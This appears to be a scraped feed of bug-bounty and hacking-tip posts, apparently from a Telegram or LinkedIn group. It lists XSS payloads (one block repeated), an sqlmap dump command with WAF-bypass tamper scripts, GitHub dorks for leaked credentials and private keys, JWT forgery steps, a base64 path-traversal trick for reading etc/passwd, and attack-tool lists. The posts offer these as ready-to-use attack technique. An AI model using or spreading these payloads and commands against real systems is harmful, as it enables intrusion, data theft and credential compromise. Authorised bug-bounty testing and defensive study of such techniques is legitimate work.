Termux All Command [Telegram Group]

Discovered a new xss payload that bypasses cloudflare web application firewall!! Payload: Click%20meXSS

Free Ethical hacking, penetration testing and Red teaming courses 🔥 link - https://lnkd.in/dcUT9dtf

Hii Bug Hunter's Today I Found 7x SQLI 10x XSS Tips: waymore -i $domain -mode U -oU ./waymoreUrls.txt -url-filename -p 4 echo $domain | (gauplus || hakrawler) | grep -Ev "\.(jpeg|jpg|png|ico|woff|svg|css|ico|woff|ttf)$" > ./gaukrawler.txt cat ./waymoreUrls.txt ./gaukrawler.txt | sort -u | uro | gf endpoints > allUrls.txt To Bypass WAF sqlmap -u "https://target.com" --dbs --level=5 --risk=3 --user-agent -v3 --tamper="between,randomcase,space2comment" --batch --dump

Just installed lemma by @defparam and holy shit this is cool! : https://github.com/defparam/lemma

🤗Simple tips for bypass 403 forbidden 🕵️During a recent security assessment, I bypassed a 403 Forbidden restriction by adding encoded characters to the URL. Original URL: https://webapp.com/api.php --> 403 Forbidden Modified URL: https://webapp.com/api.php (%09) --> 200 OK

Bug Bounty Tip Recon using GitHub Dorks & Tools . GitHub Dorks for Finding Files --------------------------------- filename:manifest.xml filename:travis.yml filename:vim_settings.xml filename:database filename:prod.exs filename:prod.secret.exs filename:.npmrc _auth filename:.dockercfg filename:WebServers.xml filename:.bash_history filename:sftp-config.json filename:sftp.json filename:secrets.yml filename:.esmtprc filename:passwd filename:LocalSettings.php filename:config.php filename:config.inc.php filename:prod.secret.exs filename:configuration.php filename:.sh_history filename:shadow filename:proftpdpasswd filename:.pgpass filename:idea14.key filename:hub filename:.bash_profile filename:.env filename:wp-config.php filename:credentials filename:id_rsa filename:id_dsa filename:.ovpn filename:.cscfg filename:.rdp filename:.mdf filename:.sdf filename:.sqlite filename:.psafe3 filename:secret_token.rb filename:carrierwave.rb filename:database.yml filename:.keychain filename:.kwallet filename:.exports filename:config.yaml filename:settings .py filename:credentials.xml GitHub Dorks for Finding API Keys, Tokens, and Passwords --------------------------------- api_key authorization_bearer: oauth auth authentication client_secret api_token: client_id OTP HOMEBREW_GITHUB_API_TOKEN SF_USERNAME HEROKU_API_KEY JEKYLL_GITHUB_TOKEN shodan_api_key api.forecast .io password user_password user_pass passcode client_secret secret password hash user auth Open-Source Automation Tools --------------------------------- TruffleHog gitGraber GitHound Github-Dorks GitGot GitMonitor Wraith GittyLeaks GitSecrets Cheers!

JTW Attack & Tools 🧵 1. Check for sensitive data in the JWT Check if any user info or any sensitive info is there in payload section. 2. None algorithm Change "alg:" to none "alg:none" { "alg": "none", "typ": "JWT" } 3. Change algorithm from RS256 to HS256 Get the Public key from the Application Now generate new JWT token. Use the generated token in the request and try changing payload. 4. Signature not being checked Switch to JSON Web Token Tab or JOSEPH. Change Payload section and Remove the Signature completely or try changing some characters in signature 5. Crack secret key 6. Null kid Tools - JWT Tool -https://github.com/ticarpi/jwt_tool JWT Editor extension jwtXploiter - https://github.com/DontPanicO/jwtXploiter

💥Complete Bug Bounty tool List💥 dnscan lnkd.in/gP47a9Ny Knockpy lnkd.in/gNnBx_42 Sublist3r lnkd.in/ghRKMZma massdns lnkd.in/gMKV6_6g nmap nmap.org masscan lnkd.in/gkz3cTcs EyeWitness lnkd.in/gaeHUyz4 DirBuster lnkd.in/gp5NpbC2 dirsearch lnkd.in/gznnrW7e Gitrob lnkd.in/gG6cJGZS git-secrets lnkd.in/g-MVy3jd sandcastle lnkd.in/gQUyHRN6 bucket_finder lnkd.in/gdvTuCwQ GoogD0rker lnkd.in/gfb3sxaK Wayback Machine web.archive.org waybackurls lnkd.in/gPq2G72H Sn1per lnkd.in/gGsYUF-D XRay lnkd.in/gdyk5NXV wfuzz lnkd.in/gv-a5tSn patator lnkd.in/gjNvbwpK datasploit lnkd.in/gnT--Shh hydra lnkd.in/g6KisNkC changeme lnkd.in/gQQhP8bU MobSF lnkd.in/gVWiQ7UY Apktool lnkd.in/gJ_H96T8 dex2jar lnkd.in/gQ6eWrgs sqlmap sqlmap.org oxml_xxe lnkd.in/gCFgYuV6 XXE Injector lnkd.in/gBYcPhQa The JSON Web Token Toolkit lnkd.in/gBqxBQwi ground-control lnkd.in/g_Vf4neV ssrfDetector lnkd.in/gwfDeTp8 LFISuit lnkd.in/gt_nqZV4 GitTools lnkd.in/gFyiFAQG dvcs-ripper lnkd.in/gQh7QSXv tko-subs lnkd.in/g-KXuqJi HostileSubBruteforcer lnkd.in/gsYtkHzN Race the Web lnkd.in/gs5c_y-R ysoserial lnkd.in/g2kxupjV PHPGGC lnkd.in/g9KB-UxF CORStest lnkd.in/gWxvaqt2 retire-js lnkd.in/gKp-mjmD getsploit lnkd.in/ggSMdidf Findsploit lnkd.in/gAzpYxdx bfac lnkd.in/g6k__zkE WPScan wpscan.org CMSMap lnkd.in/gNPGXQaR Amass lnkd.in/gBzSGMiD

Hii Bug hunters Today I Found XSS + WAF Bypass : Tip: echo https://domain[.]com | katana -d 5 -ps -pss waybackarchive,commoncrawl,alienvault Try Searching manually for SQLI,XSS,SSTI

𝐒𝐔𝐒𝐀𝐍𝐎 is designed to be beginner-friendly and is completely open-source. Its primary feature? Performing all your recon processes in just one click! : https://github.com/zoros3c/susano

How I Can Get P1 Nasa easily — Dorking CC: Qadhafy Muhammad Tera Dorking: site:NASA.gov "drive url" https://lnkd.in/gRCt9nAt

   🔐 Login Page with XSS vulnerability ⚠️ #postmortemCYBERSPACEwithArit To the developers, did you really think that you fixed this bug 😅? Minimizing the input length or sanitizing simple payloads like "<script>alert(1)</script>" is not enough to stop us from exploiting XSS vulnerabilities! Tips:- [ 9 dangerous XSS payloads within just 30 characters ] "><script>alert(1)</script> "><img src=x onerror=alert(1)> "><video src onerror=alert(1)> "><audio src onerror=alert(1)> "><svg/onload=alert(1)> "><body/onload=alert(1)> "><input/onfocus=alert(1)> "><div onpointerover=alert(1)> "><b onmouseover=alert(1)>hover Enjoy! #OffSec #BugBounty #XSS

🔐 Login Page with XSS vulnerability ⚠️ #postmortemCYBERSPACEwithArit To the developers, did you really think that you fixed this bug 😅? Minimizing the input length or sanitizing simple payloads like "<script>alert(1)</script>" is not enough to stop us from exploiting XSS vulnerabilities! Tips:- [ 9 dangerous XSS payloads within just 30 characters ] "><script>alert(1)</script> "><img src=x onerror=alert(1)> "><video src onerror=alert(1)> "><audio src onerror=alert(1)> "><svg/onload=alert(1)> "><body/onload=alert(1)> "><input/onfocus=alert(1)> "><div onpointerover=alert(1)> "><b onmouseover=alert(1)>hover Enjoy! #OffSec #BugBounty #XSS

Lots of fire fox Addons : https://github.com/TarekJor/Firefox-52-ESR-legacy-addon/tree/master

🕵️url/?f=etc/passwd ==> 403 encode etc/passwd as base64 🔥url/?f=L2V0Yy9wYXNzd2Q= ==> 200 #bugbountytips #Directory #website #Web #Cybersecurity #penetranttesting #SQL

🕵️Best Reconnaissance Tools ✅ Amass - Sub Enumeration ✅ Subfinder - Sub Enumeration ✅ MassDNS - DNS Resolution ✅ Subjack - Subdomain Takeover Detection ✅ Masscan - Port Scan ✅ Nmap - Network Scan ✅ SearchSploit - Vuln. Search ✅ Aquatone - Sub Screenshot hashtag#bygbounty

Advanced One-Liner for extracting filtered URLs for Injection-Based Attacks. gospider -s 'URL TARGET' -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" | gf allparam | sed 's/=./=/' | grep -Eo '(http|https)://[^&]+' | awk '!seen[$0]++' | grep '^URL TARGET'

Try this mass Wordlist for directory bruteforcing ;) https://github.com/six2dez/OneListForAll